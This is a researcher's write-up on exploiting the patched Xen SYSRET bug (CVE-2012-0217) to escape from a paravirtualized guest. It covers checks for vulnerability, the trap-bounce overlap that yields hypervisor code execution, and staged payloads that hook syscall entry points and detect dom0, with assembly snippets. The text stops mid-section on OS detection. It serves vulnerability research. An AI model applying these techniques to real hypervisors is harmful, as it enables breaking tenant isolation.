Adventures in Xen Exploitation


This post is about my experience trying to exploit the Xen SYSRET bug (CVE-2012-0217).

This issue was patched in June 2012 and was disclosed in Xen Security Advisory 7 [1]. The bug was found by Rafal Wojtczuk and Jan Beulich. Rafal gave a talk about it at Black Hat USA 2012 [2][3].

Unpatched Xen 4.1.2 and earlier releases are affected. In short, we won, learnt a lot and came up with some novel techniques along the way.

Overview, Assumptions and Prerequisites

In this post we will look at the process of developing a VM escape exploit, give some idea of how complex it is to make one robust, and show how, even with a good set of instructions from other researchers to follow, you can run into unexpected scenarios and tough choices.

I assume that you know enough about Xen to know the difference between dom0 and domU, as well as what paravirtualized (PV) and hardware virtualized (HVM) guests are. If you don’t, I recommend reading through some of the Xen wiki [4], which is a great resource.

I also want to note that I try to reference previous works as much as possible. There are probably tricks or techniques that are used that have been documented previously and I don’t necessarily mean to take credit for those. If you find I’m missing proper credit for some technique please let me know and I’ll update this post.

Why Exploit a Three-Year-Old Bug?

Although this bug is a little old by today’s standards, we thought it would be a good way to learn about Xen, which I’d never used before. We also wanted to try virtual machine (VM) escape exploitation in general, which we’d never got around to doing before.

There is a great write up [5] on the exploitation of this bug by Jordan Gruskovnjak at VUPEN. His blog post describes using an approach found by Rafal Wojtczuk to reliably exploit the vulnerability without relying on knowing the Xen address space, which is really nice.

I highly recommend reading this before continuing with my post, because I reference it often and skip over a lot of the details to avoid redundancy where possible.

Despite the very descriptive post from VUPEN, no public exploits for this bug exist. So I thought it would be fun to recreate their findings and see how far I could get.

I do think it is worth noting that iZsh from fail0verflow did release an exploit [6] targeting the same underlying SYSRET bug on FreeBSD, which is a worthwhile read. Although the underlying cause is the same, exploitation on Xen is quite different and can mostly be considered a different bug.

Exploit development environment

I figured having a working hypervisor debugger [7] was key to getting an exploit working, and it was indeed invaluable. The 4.1.x tree however does not support the debugger by default, but I was able to easily backport the patch from the Mercurial repository. There is one other small patch [8] needed. Also there are some posts about what Xen arguments you need to enable the console [9], which I found quite useful.

Overall the debugger is pretty nice, although at times it just won’t work depending on register state, so some creativity is sometimes required to know what’s actually happening in your payload. It supports some useful features like dumping the interrupt descriptor table (IDT), model-specific registers (MSRs), etc.

The debugger uses the serial console, so I figured the easiest way to have this work was to run Xen itself inside of a VM. I had no luck getting it to work in VMware Workstation, but VirtualBox worked okay as long as the Enable I/O APIC setting was turned on. This let me easily attach to and interact with the debugger’s serial console.

Triggering the bug requires a 64-bit paravirtualized (PV) domU and requires you to be in the kernel, in order to issue a hypercall that actually results in the sysret instruction being executed. I developed my exploit as a Linux kernel module (lkm), although you could presumably use any 64-bit PV guest to do it.

I used a 64-bit dom0 Linux VM to start and created a 64-bit domU. In order to ssh into the dom0 and domU VMs I had to set up secondary host-only bridged interfaces in VirtualBox and update the Xen configs to use them, but once that was done I could easily copy my lkm to domU and write shell scripts to automate restarting domU via Xen tools as needed.

It’s worth noting that in addition to the hypervisor debugger, I often relied on custom Xen builds to print debugging messages letting me know I was hitting the intended code paths.

Goals of exploitation

I try to keep a list of my high level goals when I’m exploiting something. I had a few high level goals for this exploit, many of which went beyond what was described in the public exploit blog post.

  • Reliable exploitation without leaking Xen address space
  • Bypass SMEP
  • Vulnerability detection
  • Hypervisor architecture detection
  • dom0 architecture detection
  • 32-bit and 64-bit dom0 migration
  • dom0 OS detection
  • Inter-domain data tunneling for payloads

I’ll discuss most of these in detail throughout this post.

Determining vulnerability

Before I jump into my experience triggering the vulnerability, I wanted to quickly talk about determining if the system you’re on is actually vulnerable. There are effectively four basic requirements for the exploit to work:

  • Has to be an Intel CPU
  • Has to be a 64-bit paravirtualized (PV) guest
  • Has to be a vulnerable Xen version
  • Has to be a 64-bit version of Xen hypervisor

Most of these are reasonably easy to deduce, but I think it’s worth mentioning because a lot of VM escape exploit talks and posts don’t actually talk much about profiling their environment to know what their world looks like.

Determining CPU type

The CPUID instruction can return a vendor identification string, which is “GenuineIntel” on Intel CPUs. It is returned when you execute CPUID with EAX set to 0: EBX, EDX, and ECX (in that order) will contain the vendor string. More about this can be found in the Intel 64 and IA-32 Architectures Software Developer’s Manual [10]. The fail0verflow sysret exploit mentioned earlier also contains an example of this being done.
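As a minimal sketch of that check (not taken from either exploit), the vendor string can be rebuilt from the three registers and compared against “GenuineIntel”. The function names are hypothetical, and the guarded helper assumes a GCC or Clang toolchain on x86, where <cpuid.h> provides __get_cpuid().

```c
#include <stdint.h>
#include <string.h>

/* Assemble the 12-byte vendor string from the CPUID leaf 0 registers.
 * The bytes are laid out in EBX, EDX, ECX order, least significant first. */
void cpuid_vendor_from_regs(uint32_t ebx, uint32_t edx, uint32_t ecx,
                            char out[13])
{
    const uint32_t regs[3] = { ebx, edx, ecx };
    int r, b;

    for (r = 0; r < 3; r++)
        for (b = 0; b < 4; b++)
            out[r * 4 + b] = (char)((regs[r] >> (8 * b)) & 0xff);
    out[12] = '\0';
}

/* Returns 1 when the vendor string is Intel's. */
int vendor_is_intel(const char *vendor)
{
    return strcmp(vendor, "GenuineIntel") == 0;
}

#if defined(__GNUC__) && (defined(__x86_64__) || defined(__i386__))
#include <cpuid.h>
/* Query the real CPU (GCC/Clang on x86 only). Returns 1 on Intel. */
int running_on_intel(void)
{
    unsigned int eax, ebx, ecx, edx;
    char vendor[13];

    if (!__get_cpuid(0, &eax, &ebx, &ecx, &edx))
        return 0;
    cpuid_vendor_from_regs(ebx, edx, ecx, vendor);
    return vendor_is_intel(vendor);
}
#endif
```

Keeping the register-to-string step separate from the CPUID call makes the byte ordering easy to check on any machine.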

Has to be a 64-bit PV guest

Determining if the machine you are on is paravirtualized is relatively easy. You can check dmesg output to see if it mentions Xen, or look for Xen frontend drivers in lsmod output. The easiest test, though, is to just look for /sys/hypervisor/ entries, which are populated by the Xen drivers.

A hardware VM (HVM) guest will typically be oblivious to the fact that it’s running as a Xen guest, so won’t have these same virtualization artifacts.
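A rough userland sketch of the /sys/hypervisor/ test follows. It assumes the type file, which is not mentioned above but normally reads “xen” on Linux Xen guests; the function name and the sysfs_root parameter are hypothetical and exist only so the check can be pointed at a different directory.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if <sysfs_root>/type exists and reads "xen", else 0.
 * sysfs_root would normally be "/sys/hypervisor". */
int sysfs_reports_xen(const char *sysfs_root)
{
    char path[256];
    char type[16] = "";
    FILE *f;
    int n;

    n = snprintf(path, sizeof(path), "%s/type", sysfs_root);
    if (n < 0 || n >= (int)sizeof(path))
        return 0;

    f = fopen(path, "r");
    if (f == NULL)
        return 0;                      /* no sysfs entry: not conclusive */
    if (fgets(type, sizeof(type), f) == NULL)
        type[0] = '\0';
    fclose(f);

    type[strcspn(type, "\n")] = '\0';  /* strip the trailing newline */
    return strcmp(type, "xen") == 0;
}
```

A return of 0 only means the artifact is missing, so the hypercall-based check is still worth having as a fallback.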

If for some reason on a PV guest you can’t determine that you’re paravirtualized using one of the above methods, the best alternative is to try to issue a hypercall that is only supported on PV guests. HVM guests only support a small subset of calls and any others will return -ENOSYS. You can check the hvm_hypercall64_table array in xen/arch/x86/hvm/hvm.c as an example of how few are supported.

This table looks like:

static hvm_hypercall_t *const hvm_hypercall64_table[NR_hypercalls] = {
    [ __HYPERVISOR_memory_op ] = (hvm_hypercall_t *)hvm_memory_op,
    [ __HYPERVISOR_grant_table_op ] = (hvm_hypercall_t *)hvm_grant_table_op,
    [ __HYPERVISOR_vcpu_op ] = (hvm_hypercall_t *)hvm_vcpu_op,
    [ __HYPERVISOR_physdev_op ] = (hvm_hypercall_t *)hvm_physdev_op,
    [ __HYPERVISOR_arch_1 ] = (hvm_hypercall_t *)paging_domctl_continuation
};

The list of PV hypercalls can be found in xen/include/public/xen.h by looking at the definitions prefixed with __HYPERVISOR_. You can see there are significantly more. Just as a basic example, consider HYPERVISOR_get_debugreg. This corresponds to the do_get_debugreg() function:

unsigned long do_get_debugreg(int reg)
{
    struct vcpu *curr = current;

    switch ( reg )
    {
    case 0 ... 3:
    case 6:
        return curr->arch.debugreg[reg];
    case 7:
        return (curr->arch.debugreg[7] |
                curr->arch.debugreg[5]);
    case 4 ... 5:
        return ((curr->arch.pv_vcpu.ctrlreg[4] & X86_CR4_DE) ?
                curr->arch.debugreg[reg + 2] : 0);
    }

    return -EINVAL;
}

It’s quite obvious this function returns something other than -ENOSYS, so if you do get -ENOSYS you know you’re in an HVM guest; otherwise you’re in a PV guest.
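The decision itself is tiny. A sketch, assuming ret holds whatever a PV-only hypercall such as HYPERVISOR_get_debugreg() returned; the enum and function names are hypothetical, and the value 38 is Linux’s ENOSYS, hard-coded so the check does not depend on the build host’s errno.h.

```c
/* ENOSYS as defined on Linux; hard-coded so the check does not depend
 * on the headers of the machine the code is built on. */
#define LINUX_ENOSYS 38

enum guest_kind { GUEST_PV, GUEST_HVM };

/* ret is the return value of a hypercall that only PV guests implement.
 * HVM guests get -ENOSYS for calls missing from their hypercall table. */
enum guest_kind classify_guest(long ret)
{
    return (ret == -LINUX_ENOSYS) ? GUEST_HVM : GUEST_PV;
}
```

Any other value, including an error such as -EINVAL, still means the call reached a PV handler.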

It should also be obvious if you’re already running your 64-bit binary on domU, but you can determine if you’re on a 64-bit system by simply calling uname(2) or running the uname -p command. That, combined with your PV indicator, is all you need.

Has to be a vulnerable Xen version

How can you tell if Xen is actually vulnerable?

Conveniently Xen provides version information to the guests in a hypercall. On PV guests this is also typically exposed in the aforementioned /sys/hypervisor/ directory tree, specifically in /sys/hypervisor/version/major, /sys/hypervisor/version/minor, and /sys/hypervisor/version/extra. You can combine the values in these to determine the general version.

One minor complication is that a specific version, like 4.1.2 in our case, may have been vulnerable as released but patched later, which means that the version alone might not indicate vulnerability.

Xen conveniently provides even more metadata we can use, specifically the compile date of the hypervisor, which can be found in /sys/hypervisor/compilation/compile_date. Since the patch for 4.1.2 was released in June 2012, if we check the compile_date value and see that the hypervisor was built before June 2012, we can be fairly sure the vulnerability is present.

Here is some output from a domU guest:

$ cat /sys/hypervisor/version/major
$ cat /sys/hypervisor/version/minor
$ cat /sys/hypervisor/version/extra
$ cat /sys/hypervisor/compilation/compile_date
Tue Feb 3 15:14:26 GMT 2015
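The version-plus-date heuristic could be sketched as follows. This is only an illustration under stated assumptions: the function names are hypothetical, the affected range is taken as 4.1.2 and earlier, the cutoff is the start of June 2012 at month granularity, and the date is assumed to have the same layout as the compile_date output above. A vendor that backported the fix without rebuilding on a newer date, or the reverse, would defeat it.

```c
#include <stdio.h>
#include <string.h>

/* Map a three-letter month name to 1..12, or 0 if unrecognized. */
int month_number(const char *mon)
{
    static const char *const names[12] = {
        "Jan", "Feb", "Mar", "Apr", "May", "Jun",
        "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
    };
    int i;

    for (i = 0; i < 12; i++)
        if (strcmp(mon, names[i]) == 0)
            return i + 1;
    return 0;
}

/* Parse a compile_date such as "Tue Feb 3 15:14:26 GMT 2015".
 * Returns 1 and fills year/month on success, 0 otherwise. */
int parse_compile_date(const char *s, int *year, int *month)
{
    char dow[4], mon[4], tz[8];
    int day, hh, mm, ss;

    if (sscanf(s, "%3s %3s %d %d:%d:%d %7s %d",
               dow, mon, &day, &hh, &mm, &ss, tz, year) != 8)
        return 0;
    *month = month_number(mon);
    return *month != 0;
}

/* Heuristic from the text: an affected release (4.1.2 or earlier) that
 * was built before the June 2012 fix. extra is e.g. ".2" or ".2-rc1". */
int probably_vulnerable(int major, int minor, const char *extra,
                        const char *compile_date)
{
    int patch = 0, year = 0, month = 0;

    if (extra[0] == '.' && sscanf(extra + 1, "%d", &patch) != 1)
        patch = 0;
    if (major > 4 || (major == 4 && minor > 1) ||
        (major == 4 && minor == 1 && patch > 2))
        return 0;                 /* newer than the affected range */
    if (!parse_compile_date(compile_date, &year, &month))
        return 0;                 /* unknown date: make no claim */
    return year < 2012 || (year == 2012 && month < 6);
}
```

With the compile date shown above (February 2015), the heuristic reports the build as not obviously vulnerable regardless of the version numbers.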

If for some reason these /sys/hypervisor/ files are not accessible, the same information can be obtained from the hypercall they are populated from. This is the xen_version hypercall, and from an lkm you can call it like so (with the right Xen headers included):

version = HYPERVISOR_xen_version(XENVER_version, NULL);

The first parameter indicates the subcommand you want to send to the hypercall. XENVER_version shown above gives you the major and minor numbers. XENVER_extraversion, XENVER_compileinfo, XENVER_commandline, and others can get you even more information.
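The value returned for XENVER_version packs both numbers into one integer, with the major version in the upper 16 bits and the minor version in the lower 16, as documented in Xen’s public version.h. A small decoding sketch, with hypothetical helper names:

```c
#include <stdint.h>

/* XENVER_version returns major:minor packed as 16:16 bits. */
unsigned int xen_version_major(uint32_t version)
{
    return version >> 16;
}

unsigned int xen_version_minor(uint32_t version)
{
    return version & 0xffff;
}
```

For example, a return value of 0x00040001 decodes to Xen 4.1; the point release still has to come from XENVER_extraversion.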

Has to be a 64-bit hypervisor

In order to trigger the vulnerability, the hypervisor itself must be 64-bit. I didn’t investigate ways to determine this property much because there was one easy answer in my context. A 32-bit hypervisor is not capable of running a 64-bit PV guest, only a 64-bit HVM guest. If you can determine you are a 64-bit PV guest, then you already know it’s a 64-bit hypervisor.

It’s not entirely clear to me at the moment how best to determine the architecture of the hypervisor otherwise. I suspect there will be some structure values you can query from a hypercall that will be populated in 32-bit and not on 64-bit, or vice versa. Similarly there might be some per-architecture hypercall behaviors you can somehow differentiate between. This is something for future research and I’d be interested to hear any approaches or ideas people have.

Getting code execution

So now that we can tell if the system is vulnerable, let’s move onto actually triggering the bug.

As noted, the VUPEN write up is really good and I’m not going to bother re-explaining a lot of what it already says. However, there were a few areas where my results deviated from what they described or where what they described was ambiguous or misleading (at least to me). These are topics I will touch on here. I recommend having the VUPEN article open for reference as you read the following section, as I’ll regularly reference pieces of their blog post.

The first difference I had related to the use of the mmap_region() function. The prototype of this function has changed across different versions of the Linux kernel. At one point it took six arguments, as demonstrated in the VUPEN blog; however, it takes five arguments on modern kernels. This is easy to work around, but you want to be aware of the version your lkm is built on so that you can pass the arguments appropriately. You can use LINUX_VERSION_CODE to determine what the kernel version will be at build time.

The API change was made in commit c22c0d6344c362b1dde5d8e160d3d07536aca120, which first appeared in Linux release 3.9. So anything earlier than 3.9 uses six arguments.
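A sketch of the version test, written as plain C so it can be checked outside a kernel build. KVER() is a hypothetical stand-in that uses the same encoding as the kernel’s KERNEL_VERSION() macro; in a real lkm you would instead wrap the two call forms in #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 9, 0) and #else.

```c
/* Same encoding as the kernel's KERNEL_VERSION() in <linux/version.h>. */
#define KVER(a, b, c) (((a) << 16) + ((b) << 8) + (c))

/* Number of arguments mmap_region() takes for a given version code,
 * following the 3.9 cut-over described above. */
int mmap_region_argc(int version_code)
{
    return (version_code < KVER(3, 9, 0)) ? 6 : 5;
}
```

The argument that was dropped in 3.9 is the mmap flags value; vm_flags is still passed.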

The second thing to mention is related to what happens inside emulate_privileged_op(). The VUPEN blog describes it as follows:

“Eventually the “emulate_privileged_op()” is called in “xen/x86/traps.c”, but will generate a #PF in the “read_descriptor()” sub function on the following piece of code … The “__get_user()” macro actually uses the current segment selector as the index in the kernel virtual GDT / IDT which causes a #PF on an invalid read.”

The article then describes how to work your way out of the do_page_fault() scenario by manipulating the outcome of in_irq(). I found this part of the VUPEN write up somewhat misleading, in that I didn’t initially interpret it as meaning we have to supply a malformed segment selector ourselves to cause the read to fail.

In my testing a #PF was not actually generated by the __get_user() macro by default. So I figured I had to specifically force it to fail, otherwise I’d end up staying inside read_descriptor(), which I don’t want.

As a reminder, this is the code that we’re stuck in, from xen/arch/x86/traps.c:

if ( !vm86_mode(regs) )
      if ( sel < 4)
          desc.b = desc.a = 0;
      else if ( __get_user(desc,
                      (const struct desc_struct *)(!(sel & 4)
                                                   ? GDT_VIRT_START(v)
                                                   : LDT_VIRT_START(v))
                      + (sel >> 3)) )
          return 0;

So if __get_user() is not going to throw a #PF by default, we need to figure out if we can force it to fail. This is the only code in the whole read_descriptor() function that returns 0, which we would like, so our answer will be in the __get_user() macro or the parameters passed to it.

The __get_user() macro itself simply reads from a userland pointer, as indicated below.

/*
 * This macro copies a single simple variable from user space to kernel
 * space.  It supports simple types like char and int, but not larger
 * data types like structures or arrays.  [...]
 */
#define __get_user(x,ptr) \
  __get_user_nocheck((x),(ptr),sizeof(*(ptr)))

The macro itself doesn’t really give us the opportunity to force it to fail, so we have to look to the arguments instead. First, how do the GDT_VIRT_START() and LDT_VIRT_START() macros work?

/* The address of a particular VCPU's GDT or LDT. */
#define GDT_VIRT_START(v)    \
    (PERDOMAIN_VIRT_START + ((v)->vcpu_id << GDT_LDT_VCPU_VA_SHIFT))
#define LDT_VIRT_START(v)    \
    (GDT_VIRT_START(v) + (64*1024))

We see that both construct the address to dereference using the virtual CPU (vcpu) identifier. If we could manipulate this, we might be able to force the read to fail and then page fault on an invalid address. We need to know where v comes from in this context.

If we go back and look at the read_descriptor() call in emulate_privileged_op() we’ll see that the variable v simply points to current, which if you’ve read the VUPEN article, you know we control because it is basically a macro that points to the top of our controlled stack.

static int emulate_privileged_op(struct cpu_user_regs *regs)
{
    struct vcpu *v = current;
    [...]
    if ( !read_descriptor(regs->cs, v, regs,
                          &code_base, &code_limit, &ar,
                          _SEGMENT_CODE|_SEGMENT_S|_SEGMENT_DPL|_SEGMENT_P) )
        goto fail;

We have two options. The first, which VUPEN indicated, is that we also control the regs argument, so we can provide an arbitrary regs->cs selector that results in an invalid address.

Alternately, we can provide an arbitrary vcpu->vcpu_id value, and achieve similar results. As long as we make this an invalid address, we can trigger the #PF that VUPEN mentioned, and get the result from __get_user() we want. I ended up using the modified vcpu_id because it wasn’t until afterwards I realized what was meant by the selector causing it to fail.
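To make the two knobs concrete, here is a sketch of how the address read by __get_user() is formed. It assumes the per-vcpu GDT address has the form base + (vcpu_id << shift); the function and parameter names are hypothetical, and the base and shift are passed in rather than hard-coded because they depend on the Xen build. The 8-byte descriptor size and the 64 KiB LDT offset follow from the excerpts above.

```c
#include <stdint.h>

#define DESC_SIZE   8u             /* sizeof(struct desc_struct) */
#define LDT_OFFSET  (64u * 1024u)  /* LDT sits 64 KiB above the GDT */

/* Address that read_descriptor() hands to __get_user() for a selector.
 * perdomain_base and vcpu_va_shift stand in for build-specific values. */
uint64_t descriptor_read_addr(uint64_t perdomain_base, uint64_t vcpu_id,
                              unsigned int vcpu_va_shift, uint16_t sel)
{
    uint64_t gdt = perdomain_base + (vcpu_id << vcpu_va_shift);
    uint64_t table = (sel & 4) ? gdt + LDT_OFFSET : gdt;  /* TI bit */

    return table + (uint64_t)(sel >> 3) * DESC_SIZE;
}
```

The selector can only move the address within a 64 KiB window of one table, whereas vcpu_id moves the whole window, which is why either value can steer the read towards unmapped memory.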

There is one last thing that I found misleading in the VUPEN write up, which is related to using do_guest_trap() to actually overwrite the return address and cs selector that will be used during the iretq.

The way this trick is described by the VUPEN blog post is:

“The current pointer is again used to initialize the trap_bounce structure. The addresses of the two structures are offsets from arch pointer which is a field of the current pointer. One can easily supply an arbitrary arch pointer such that the tb->cs and tb->eip will overlap with respectively the saved CS and RIP of the instruction after the SYSRET instruction which generated the #GP fault.”

The arch member of the vcpu structure is not a pointer, it’s just an inline structure. This means you can’t actually provide an arbitrary arch pointer in order to overlap the trap_bounce structure. The approach is slightly different than what is implied. I have no doubt what I do is exactly what they did, I just want to clarify what was actually meant, to aid anyone else that tries to exploit the bug. So how do we do it then?

What we need to do is use the vcpu pointer itself to facilitate the overlap. This worried me at first because the stored return address and cs selector we want to overwrite are on the stack currently being used, and we have to overlay the entire vcpu structure onto the stack. This means that as functions and stack frames are used along the exploit paths, we’re manipulating values inside the fake vcpu structure. The biggest concern was that the unavoidable stack usage on the way to do_guest_trap() would overwrite the trap context values that we need to keep control of, since those are what get written to the trap_bounce structure, which overlaps our overwrite target.

If the vcpu structure wasn’t so massive, and specifically if the distance between vcpu->arch.trap_bounce and vcpu->arch.guest_context.trap_ctxt wasn’t so big, we could’ve run into trouble. In practice the distance between the two parts of the structure was over 0x1000 bytes, which left enough room to avoid unwanted corruption. To show what exactly is happening with this vcpu overlap, and how the arch.guest_context.trap_ctxt values end up in arch.trap_bounce, which is positioned to overlap the saved return values used by the iret, I’ve tried to illustrate the situation below.

So once that’s all finished the iretq will occur and we’ll jump to an arbitrary address and code selector we control, which we can use to execute code within the hypervisor context.

When it comes to an exploit like this however, which VUPEN correctly equated to remote kernel exploitation, getting code execution is often only the beginning. More fun to follow.

Bypassing SMEP

I was able to successfully bypass SMEP while exploiting this bug.

A separate blog post about bypassing SMEP has been made available here:

Xen SMEP and SMEP Bypass

Stage 1 payload

My payload is broken into three broad stages. The first stage is executed in what is sometimes referred to as the ‘fault context’, which isn’t ideal for doing a lot of work. Operating solely from this context wouldn’t allow us to safely poke around other domains or anything like that. So the goal of stage 1 is simply to hook into the hypervisor and set up a stage 2 payload that will be called from within the process context.

This is done by hooking three entry points. The first is the IDT at index 0x80, which is still used for system calls on some 32-bit x86 OSes. The second is the IA32_SYSENTER_EIP model-specific register (MSR), which holds the entry point for ring3 to ring0 transitions via the sysenter instruction, used for syscalls on most 32-bit x86 OSes. The last is the IA32_LSTAR MSR, which holds the entry point for ring3 to ring0 transitions via the syscall instruction, used for syscalls on 64-bit x86 OSes.

Why we hook all three of these will become clear in later phases, but basically it allows us to support 32-bit and 64-bit dom0 migration, and also carry out dom0 OS detection.

We need to point all of these hook locations to our stage 2 payload, which raises the question: where do we store stage 2? We need to dynamically find a place to store it. The VUPEN paper discusses storing this in an unused portion of the hypervisor, since the .text segment is RWX. At first I tried to scan for a NULL cavity after .text ended and before the read-only data, however in practice I never found a spot big enough. I also tried scanning backwards to find an ELF header for the hypervisor in hopes of parsing it to determine the exact point that certain cavities might exist, but it turns out no ELF header is in memory.

One option then would be to simply scan for certain patterns in dead code, like a panic() function, or some debugging routines and store the payload there. Depending on your payload size though, this could be somewhat limiting. Instead I started poking around the memory space. If you look at where the Xen hypervisor code starts in memory you’ll see this:

*  0xffff82d080000000 - 0xffff82d0bfffffff [1GB,   2^30 bytes, PML4:261]
*    Xen text, static data, bss.

However, in practice the hypervisor is actually mapped into memory at an offset from that base address. You can see that in the Xen linker script at xen/arch/x86/

#if !defined(EFI)
  __image_base__ = .;
  . = __XEN_VIRT_START + 0x100000;
  _start = .;
  .text : {

In my testing it seemed that the memory between __XEN_VIRT_START and __XEN_VIRT_START+0x100000 was largely unused. So I simply scanned backwards from a .text address I knew in the hypervisor until I found a cavity of NULLs large enough to hold the payload.
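The backwards scan can be sketched as below. This is an illustrative userland version over a byte buffer with a hypothetical function name; in the payload the same loop would walk hypervisor memory downwards from the known .text address, and the lower bound (index 0 here) would correspond to __XEN_VIRT_START.

```c
#include <stddef.h>

/* Scan backwards from buf[start] (exclusive) for `need` consecutive zero
 * bytes. Returns the offset of the first byte of the cavity, or -1. */
long find_zero_cavity_backwards(const unsigned char *buf, size_t start,
                                size_t need)
{
    size_t run = 0;
    size_t i = start;

    if (need == 0)
        return -1;
    while (i > 0) {
        i--;
        if (buf[i] == 0) {
            if (++run == need)
                return (long)i;   /* cavity covers buf[i .. i+need-1] */
        } else {
            run = 0;              /* non-zero byte breaks the run */
        }
    }
    return -1;
}
```

Because the scan moves downwards, the cavity it reports is the one closest to the starting address that is large enough.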

This seemed stable in all of my testing, however it’s possible that the region is used for something I overlooked. To be clear, we’re running inside stage 1 at this point, so finding a valid hypervisor .text address is trivial. We can just use the original function address in one of the MSRs we hook, etc.

There is another more reliable way to store the payload without relying on the above, however, it will be described in the future post about bypassing SMEP.

So, now that we’ve got a place to store stage 2 and we’ve hooked everything, we need stage 1 to exit cleanly from the hypervisor. Ideally this should jump back into our LKM in domU, so that we can unload the module (eventually) and also not cause any issues on the hypervisor end. We can simply set up a custom iret stack that points to some safe spot in our LKM that allows us to recover, and we’re good. This is no different from most kernel exploit payloads that need to transition from ring0 to ring3, which have been used for ages.

To allow my exploit to resume exactly after the call I issue to trigger the sysret bug, I store my exploit’s stack pointer inside my payload right before the call. I also store the address of a label immediately following the jump to my syscall instruction, which is where the recovery code will return to. This looks like the following:

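__asm__ __volatile__(
    "movq %0, %%rax\n\t"        /* rax = address of the orig_stack slot */
    "movq %%rsp, (%%rax)\n\t"   /* save our current stack pointer there */
    "movq %1, %%rsp\n\t"        /* switch to the crafted stack */
    "jmp *%%rbx\n\t"            /* jump to the syscall instruction */
    : /* no outputs */
    : "g"(orig_stack), "g"(sp), "b"(SYSRET_ADDR)
    : "rax", "memory"
);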

And my recovery code in the stage 1 payload is:

pushq $0xe02b                # SS segment
movq orig_stack(%rip), %rax
pushq %rax                   # Stack address (orig_stack)
pushq $0x246                 # RFLAGS
pushq $0xe033                # CS segment
movq safe_label(%rip), %rax  # Safe return address (recover label)
pushq %rax

Stage 2 payload

So now that the stage 2 payload is in place, and since we might be entering it from one of three hooks, we record the trap type before jumping to a central entry point. Our stage 2 payload will be responsible for a lot of work.

dom0 detection

We want to target processes trapping into the hypervisor from dom0 only, and ignore the rest. VUPEN mentioned only targeting dom0, but doesn’t actually say how. When you intercept a trap a legit vcpu structure will be accessible on the current stack, so we can basically replicate what Xen itself does. We get a pointer to the vcpu and grab its vcpu->domain pointer, which contains a domain_id member. We simply exit early if this value is not zero.

mov $0xffffffffffff8000, %rax
andq %rsp, %rax
orq $0x7fe8, %rax
movq (%rax), %rax 
# Is this domain 0? - current->domain->domain_id
movq 0x10(%rax), %rbx
movq (%rbx), %rcx
cmp $0x0, %rcx
jne cleanup
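The first three instructions above are plain pointer arithmetic, sketched here in C. The constants are read straight off the assembly (a 0x8000-byte stack and a slot at offset 0x7fe8, which may differ between Xen builds), and the macro and function names are hypothetical.

```c
#include <stdint.h>

#define XEN_STACK_SIZE    0x8000ULL  /* stack size implied by the mask above */
#define CURRENT_SLOT_OFF  0x7fe8ULL  /* offset used by the assembly above */

/* Address of the slot at the top of the hypervisor stack that holds the
 * pointer to the current vcpu, derived from any stack pointer value. */
uint64_t current_vcpu_slot(uint64_t rsp)
{
    return (rsp & ~(XEN_STACK_SIZE - 1)) | CURRENT_SLOT_OFF;
}
```

Any stack pointer within the same 0x8000-byte stack yields the same slot, which is what lets the payload find the vcpu without knowing any hypervisor addresses in advance.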

Userland detection

VUPEN also didn’t mention exactly how this is done, but Xen conveniently provides a flag called TF_kernel_mode that indicates whether or not a trap occurred from kernel or userland. This can be found in the vcpu->arch.flags field.

Checking this flag is only relevant when our payload is entered via a syscall instruction, which userland uses for calling syscalls in the guest kernel and the guest kernel uses for calling hypercalls in the Xen hypervisor. On the other hand, on 32-bit, sysenter is only used by userland calling syscalls in the guest kernel, so it immediately lets you know it’s a userland process. Similarly int 0x80 is only used by userland for syscalls, whereas int 0x82 is used by the kernel for hypercalls.

Architecture detection

Now that we know we’ve trapped something from dom0 we want to know what architecture it is, as this will inform how we actually migrate into it eventually. In general the easiest way to do this is detect how the process trapped into the payload. 64-bit Linux will issue syscalls via the syscall instruction. 32-bit Linux will use the sysenter instruction.

Relying just on the trap type isn’t quite enough however because of 32-bit compatibility, which could mean that a 32-bit process is running on 64-bit Linux. Fortunately Xen provides a flag that indicates if the domain is a 32-bit PV guest or not, which can be found in vcpu->domain->arch.is_32bit_pv. So we can use the trap type as a general indicator, but make sure we’re correct by double checking against this value.
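The userland and architecture checks from the last two sections can be sketched together. The trap_type values and function names are hypothetical, TF_KERNEL_MODE is assumed to mirror the bit Xen uses for TF_kernel_mode in vcpu->arch.flags, and treating a non-syscall trap on a 64-bit dom0 as a 32-bit process is a heuristic, not a guarantee.

```c
/* How the stage 2 payload was entered (recorded by each hook). */
enum trap_type { TRAP_INT80, TRAP_SYSENTER, TRAP_SYSCALL };

/* Assumed to mirror Xen's TF_kernel_mode bit in vcpu->arch.flags. */
#define TF_KERNEL_MODE 0x1UL

/* Returns 1 when the trap came from guest userland. Only the syscall
 * instruction is shared between userland syscalls and kernel hypercalls. */
int trap_from_userland(enum trap_type t, unsigned long arch_flags)
{
    if (t == TRAP_SYSCALL)
        return (arch_flags & TF_KERNEL_MODE) == 0;
    return 1;
}

/* Width of the dom0 kernel, taken from the domain's is_32bit_pv flag. */
int dom0_kernel_bits(int is_32bit_pv)
{
    return is_32bit_pv ? 32 : 64;
}

/* Returns 1 when a 64-bit dom0 is most likely running a 32-bit process,
 * i.e. the trap type disagrees with the kernel width. */
int is_compat_process(enum trap_type t, int is_32bit_pv)
{
    return !is_32bit_pv && t != TRAP_SYSCALL;
}
```

The flag decides the kernel architecture, while the trap type decides which syscall ABI the intercepted process is using.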

OS detection

Technically dom0 can be Linux, NetBSD, or OpenSolaris. The latter is discontinued and only OpenSolaris 2009 was a supported dom0, so I don’t worry about it at the moment. If we want to migrate into dom0 it is better to try to determine what operating system it is rather than assume it is Linux.

There are a few ways this could be done. Two ways stood out as the easiest to me.

The most obvious way to me was to scan through the kernel memory of the trapping dom0 guest and search for some sort of identifiable string unique to each OS. This should work in principle, but I didn’t like the approach for several reasons: I was worried that strings might change and not be reliable; it is slow to search through all of memory; NetBSD contains references to the string “Linux” (so I’d have to find something potentially more volatile than something that simple); and lastly I don’t technically know where the kernel memory ends, so I could potentially crash by running off the end of memory.

The second idea I had was to inject a system call into the trapping dom0 process that could be used to differentiate between the operating systems. By finding a syscall that is valid on one and invalid on the other, it should be relatively easy to intercept the return value and figure it out. This is the route I went down. By comparing the syscall tables in 32-bit and 64-bit Linux, and NetBSD (which uses the same table for both architectures), I found one pretty quickly.

In NetBSD they’ve got the following syscall, from /usr/src/sys/kern/syscalls.master:

391    IGNORED    old posix_fadvise

On NetBSD the IGNORED syscall types will simply return success. This is noted in the syscalls.master file header: “IGNORED syscall is a null op, but always succeeds”

